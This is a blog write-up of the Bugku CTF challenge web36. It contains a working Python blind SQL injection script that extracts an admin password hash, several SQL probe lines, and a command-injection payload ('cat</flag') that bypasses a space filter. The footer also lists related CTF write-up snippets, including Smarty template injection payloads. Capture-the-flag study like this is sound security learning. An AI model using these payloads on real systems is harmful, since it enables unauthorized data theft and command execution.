首页 > 数据库 >Bugku-web36(sql注入)

Bugku-web36(sql注入)

时间:2023-08-30 09:14:21浏览次数:44  
标签:Bugku sql web36 flag user mysql where select

images

这个题目对于我来说还是很有难度的;;;毕竟我菜;;;唉;;;

打开页面是个登录界面::

images

扫描看了一圈发现这个images下面有这个sql的图片,这个是sql注入问题没错了,但是怎么注入是个问题;;sql注入学的太菜了;还是好好补基础;

images

看了各种大师傅的blog还是挺懵逼的;;;

select user from mysql.user where user=''0;
select user from mysql.user where user=''1;
select user from mysql.user where user=''!=(mid(user)from(-1))='t');

有个脚本可以看看;;

import requests

url='http://114.67.246.176:17939/login.php'

flag=""
for j in range(1,50):
    for i in range(32,128):
            payload = "admin'^(ascii(substr((select(passwd)from(admin))from("+str(j)+")))="+str(i)+")^'1"
            data = {
                "uname": payload,
                "passwd": "123"
            }
            test = requests.post(url=url,data=data).text
            if 'password' in test:
                flag += chr(i)
                print(flag)
                break

images
跑出来之后md5解密是bugkuctf,账号是‘-0-’

登录之后是个查询页面,这个查询页面需要绕过空格;;;大师傅们都是用<绕过的;;

cat</flag

images
burp爆破的方式::

images
images
images
images
images
先按照1筛选出没有打勾的,然后按照2升序排序,再计算3的ASCII码值;;凑出来的是::4dcc88f8f1bc05e7c2ad1a60288481a2;;再进行md5解密;;这个题目确实用脚本快很多;;

标签:Bugku,sql,web36,flag,user,mysql,where,select
From: https://www.cnblogs.com/KAKSKY/p/17666331.html

相关文章

  • Bugku-web37
    不能放过任何提示或是编码:参考博客::https://blog.csdn.net/qq_41209264/article/details/112300712$sql="SELECTusername,passwordFROMadminWHEREusername='".$username."'";if(!empty($row)&&$row['password']===md5($passwo......
  • Bugku-web39(CBC反转攻击)
    传入cipher::o0Na0VUpA9NNqK5lQTP3chZqec57H%2FAMEkq5YSNE3oDfyc1WXAyLMW8RbiwIX9dyKMF5uwWSEzJVCKxOsDnVcQ%3D%3D传入的vi::L4p%2BUXpwki%2FiUktyYxs7eg%3D%3D<?phpheader("Content-Type:text/html;charset=utf-8");#计算cipher/*明文1:a:2:{s:8:&q......
  • Bugku-web40
    这题考察的是git信息泄露,挺好的题目;;我都不懂git信息泄露是什么鬼用dirsearch扫描后有.git目录,电脑浏览器访问发现不了什么,看了大哥的博客,用kali里面的git命令,现在学习一下这些命令::wget递归下载::gitreflog::查看执行的命令日志gitresetcommit_id::回退到该版本的版本库gitshow......
  • Bugku-web41
    该题目涉及到了序列化;Base64解码;cgi;ssrf;php中的file协议;代码审计,我只知道涉及到了序列化,还有我提交的方法是POST的,其他的我都不是很懂了,所以看了别人的wp;;https://blog.csdn.net/qq_53460654/article/details/116329685<?php// php版本:5.4.44header("Content-type: text/h......
  • Bugku-web安慰奖(序列化)
    php序列化的一个题目;;参考博客:https://blog.csdn.net/weixin_44190459/article/details/116648636目前还没有搞明白怎么一回事:<?phpclassctf{protected$username='admin';protected$cmd='tacflag.php';}$ctf=newctf();echoserialize($ctf);;?>......
  • Bugku-xxx二手交易市场
    注入点在上传图片处,图片上传后会被base64编码,就从这里入手,上传一句话木马;image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1BPU1RbJ2ZsYWcnXSk7Pz4=......
  • Bugku-聪明的php
    smarty模板注入常用的payload常用payload常用payload{ifphpinfo()}{/if}{ifsystem('ls')}{/if}{ifreadfile('/flag')}{/if}{ifshow_source('/flag')}{/if}{ifsystem('cat../../../flag')}{/if}smarty中的{if}标签中可以执行php语句随便传参可......
  • mysql学习教程篇(三)
    一、分组查询#进阶5:分组查询/*语法:select查询列表from表【where筛选条件】groupby分组的字段【orderby排序的字段】;特点:1、和分组函数一同查询的字段必须是groupby后出现的字段2、筛选分为两类:分组前筛选和分组后筛选 针对的表 位置 连接的关键字分......
  • mysql学习教程篇(二)——基础查询和条件查询
    1.基础查询#进阶1:基础查询/*语法:select查询列表from表名;类似于:System.out.println(打印东西);特点:1、查询列表可以是:表中的字段、常量值、表达式、函数2、查询的结果是一个虚拟的表格*/USEmyemployees;#1.查询表中的单个字段SELECTlast_nameFROMemploy......
  • docker 安装mysql
    dockerpullmysqldockerimagesdockerrun-p3306:3306--namemysql--restart=always--privileged=true\-v/usr/local/mysql/log:/var/log/mysql\-v/usr/local/mysql/data:/var/lib/mysql\-v/usr/local/mysql/conf:/etc/mysql\-v/etc/localtime:/et......